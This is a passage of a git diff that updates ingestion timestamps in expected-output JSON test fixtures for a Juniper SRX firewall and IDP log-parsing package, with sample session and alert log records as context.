"original": "\u003c14\u003e1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"response received\" source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packets-from-client=\"1\" bytes-from-client=\"84\" packets-from-server=\"1\" bytes-from-server=\"84\" elapsed-time=\"0\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "start": "2010-09-30T06:55:07.188Z", @@ -862,7 +862,7 @@ "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707031700Z", + "ingested": "2021-12-14T14:47:11.679899393Z", "original": "\u003c14\u003e1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP FIN\" source-address=\"10.3.255.203\" source-port=\"47776\" destination-address=\"67.43.156.15\" destination-port=\"80\" connection-tag=\"0\" service-name=\"junos-http\" nat-source-address=\"10.3.136.49\" nat-source-port=\"19162\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"nat1\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit_all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"5\" packets-from-client=\"6\" bytes-from-client=\"337\" packets-from-server=\"4\" bytes-from-server=\"535\" elapsed-time=\"1\" application=\"HTTP\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/0.0\" encrypted=\"No\" application-category=\"Web\" application-sub-category=\"N/A\" application-risk=\"4\" application-characteristics=\"Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;\"]", "risk_score": 4.0, "kind": "event", @@ -970,7 +970,7 @@ "event": { "duration": 16000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707037500Z", + "ingested": "2021-12-14T14:47:11.679899790Z", "original": "\u003c14\u003e1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP RST\" source-address=\"192.168.2.164\" source-port=\"53232\" destination-address=\"172.16.1.19\" destination-port=\"445\" service-name=\"junos-smb\" nat-source-address=\"192.168.2.164\" nat-source-port=\"53232\" nat-destination-address=\"172.16.1.19\" nat-destination-port=\"445\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"35\" source-zone-name=\"Trust\" destination-zone-name=\"Trust\" session-id-32=\"206\" packets-from-client=\"13\" bytes-from-client=\"4274\" packets-from-server=\"9\" bytes-from-server=\"1575\" elapsed-time=\"16\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/2.0\"]", "kind": "event", "start": "2019-04-13T14:33:06.576Z", @@ -1102,7 +1102,7 @@ "event": { "duration": 8000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707045Z", + "ingested": "2021-12-14T14:47:11.679900173Z", "original": "\u003c14\u003e1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"67.43.156.14\" source-port=\"52890\" destination-address=\"67.43.156.14\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"11152\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-10-07T01:32:20.898Z", @@ -1224,7 +1224,7 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707054600Z", + "ingested": "2021-12-14T14:47:11.679900572Z", "original": "\u003c14\u003e1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-06-30T02:17:22.753Z", @@ -1336,7 +1336,7 @@ "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707064800Z", + "ingested": "2021-12-14T14:47:11.679901243Z", "original": "\u003c14\u003e1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"10.164.110.223\" source-port=\"9057\" destination-address=\"10.104.12.161\" destination-port=\"21\" service-name=\"junos-ftp\" nat-source-address=\"10.9.1.150\" nat-source-port=\"58020\" nat-destination-address=\"10.12.70.1\" nat-destination-port=\"21\" src-nat-rule-name=\"SNAT-Policy5\" dst-nat-rule-name=\"NAT-Policy10\" protocol-id=\"6\" policy-name=\"FW-FTP\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"24311\" packets-from-client=\"0\" bytes-from-client=\"0\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"1\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.0\" encrypted=\"No \"]", "kind": "event", "start": "2015-09-25T14:19:53.846Z", @@ -1453,7 +1453,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707069700Z", + "ingested": "2021-12-14T14:47:11.679901636Z", "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "action": "flow_started", @@ -1579,7 +1579,7 @@ "event": { "duration": 0, "severity": 14, - "ingested": "2021-12-10T10:13:51.707074200Z", + "ingested": "2021-12-14T14:47:11.679902026Z", "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", @@ -1709,7 +1709,7 @@ "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707078Z", + "ingested": "2021-12-14T14:47:11.679902414Z", "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", @@ -1850,7 +1850,7 @@ "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707084500Z", + "ingested": "2021-12-14T14:47:11.679902819Z", "original": "\u003c14\u003e1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:18.040Z", @@ -1983,7 +1983,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707095700Z", + "ingested": "2021-12-14T14:47:11.679903398Z", "original": "\u003c14\u003e1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "action": "flow_started", @@ -2121,7 +2121,7 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707105400Z", + "ingested": "2021-12-14T14:47:11.679903813Z", "original": "\u003c14\u003e1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:20.040Z", @@ -2239,7 +2239,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707114900Z", + "ingested": "2021-12-14T14:47:11.679904206Z", "original": "\u003c14\u003e1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", @@ -2321,7 +2321,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707124300Z", + "ingested": "2021-12-14T14:47:11.679904617Z", "original": "\u003c14\u003e1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"10.128.0.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", @@ -2459,7 +2459,7 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707133700Z", + "ingested": "2021-12-14T14:47:11.679905009Z", "original": "\u003c14\u003e1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2020-01-19T15:18:20.040Z", @@ -2580,7 +2580,7 @@ "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707143100Z", + "ingested": "2021-12-14T14:47:11.679905465Z", "original": "\u003c14\u003e1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"58943\" destination-address=\"67.43.156.14\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"6018\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"80\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"16118\" packets-from-client=\"42\" bytes-from-client=\"2322\" packets-from-server=\"34\" bytes-from-server=\"2132\" elapsed-time=\"60\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" destination-interface-name=\"ge-0/0/0.0\" category=\"N/A\" sub-category=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-14T14:17:11.928Z", @@ -2710,7 +2710,7 @@ "event": { "duration": 23755000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707152400Z", + "ingested": "2021-12-14T14:47:11.679905852Z", "original": "\u003c14\u003e1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"10.1.1.100\" source-port=\"64720\" destination-address=\"67.43.156.15\" destination-port=\"8883\" connection-tag=\"0\" service-name=\"None\" nat-source-address=\"172.19.34.100\" nat-source-port=\"24519\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"8883\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"3851\" packets-from-client=\"161\" bytes-from-client=\"9530\" packets-from-server=\"96\" bytes-from-server=\"9670\" elapsed-time=\"23755\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" secure-web-proxy-session-type=\"NA\" peer-session-id=\"0\" peer-source-address=\"0.0.0.0\" peer-source-port=\"0\" peer-destination-address=\"0.0.0.0\" peer-destination-port=\"0\" hostname=\"NA NA\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", @@ -2823,7 +2823,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:13:51.707162Z", + "ingested": "2021-12-14T14:47:11.679906338Z", "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"67.43.156.15\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", @@ -2947,7 +2947,7 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-10T10:13:51.707171200Z", + "ingested": "2021-12-14T14:47:11.679906745Z", "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-13T16:12:05.530Z", diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json index 2d9eb57de25..85624c466b3 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-idp.log-expected.json @@ -111,7 +111,7 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-09T13:40:03.197201400Z", + "ingested": "2021-12-14T14:47:24.701235269Z", "original": "\u003c165\u003e1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.14\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"HTTP:MISC:GENERIC-DIR-TRAVERSAL\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", "kind": "alert", "start": "2020-03-02T23:13:03.193Z", @@ -240,7 +240,7 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-09T13:40:03.197210Z", + "ingested": "2021-12-14T14:47:24.701238566Z", "original": "\u003c165\u003e1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.14\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"CRITICAL\" attack-name=\"TCP:C2S:AMBIG:C2S-SYN-DATA\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", "kind": "alert", "start": "2020-03-02T23:13:03.197Z", @@ -360,7 +360,7 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-09T13:40:03.197213600Z", + "ingested": "2021-12-14T14:47:24.701239044Z", "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.19.13.11\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", "kind": "alert", "start": "2007-02-15T09:17:15.719Z", @@ -480,7 +480,7 @@ "event": { "duration": 0, "severity": 165, - "ingested": "2021-12-09T13:40:03.197218Z", + "ingested": "2021-12-14T14:47:24.701239455Z", "original": "\u003c165\u003e1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.16.1.10\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", "kind": "alert", "start": "2017-10-12T21:55:55.792Z", @@ -555,7 +555,7 @@ }, "event": { "severity": 165, - "ingested": "2021-12-09T13:40:03.197223300Z", + "ingested": "2021-12-14T14:47:24.701239828Z", "original": "\u003c165\u003e1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@67.43.156.15 epoch-time=\"1319367986\" ddos-application-name=\"Webserver\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" rulebase-name=\"DDOS\" policy-name=\"A DoS-Webserver\" repeat-count=\"0\" message=\"Connection rate exceeded limit 60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", @@ -651,7 +651,7 @@ }, "event": { "severity": 165, - "ingested": "2021-12-09T13:40:03.197228800Z", + "ingested": "2021-12-14T14:47:24.701240203Z", "original": "\u003c165\u003e1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@67.43.156.15 epoch-time=\"1319419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth1.O\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", @@ -747,7 +747,7 @@ }, "event": { "severity": 165, - "ingested": 